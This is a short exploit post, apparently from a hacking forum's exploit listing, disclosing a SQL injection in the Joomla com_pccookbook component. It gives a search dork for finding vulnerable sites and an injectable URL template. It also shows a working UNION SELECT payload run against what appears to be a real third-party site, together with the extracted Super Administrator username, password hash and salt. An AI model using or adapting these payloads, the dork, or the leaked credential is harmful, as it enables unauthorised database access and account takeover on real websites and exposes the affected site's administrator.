facebook facebook twitter rss

joomla com_pccookbook Components Sql Injection vulnerability

Author: hackfans , Published: 17-11-2013
#################################

# Exploit Title : joomla com_pccookbook Components Sql Injection vulnerability

# Author : hackfans.org

# Discovered By : hackfans.org

# Home : http://forums.hackfans.org

# Software Link : http://www.joomla.org

# Security Risk : High

# Tested on : Linux

# Dork : inurl:index.php?option=com_pccookbook

###########################

joomla com_pccookbook Components Sql Injection vulnerability

#################################
Exploit :

# http://www.Site.com/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=[Sql]

# Dem0 :

# http://www.bpang.com/bp/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999+UNION+SELECT+concat%280x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e%29+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--

# Recipes of user: bpang:8654c89a107de0f0fb34c2ee7c7da8d4:wlFlfmbRhxm2OK4g:Super Administrator

#################################

Like us on Facebook :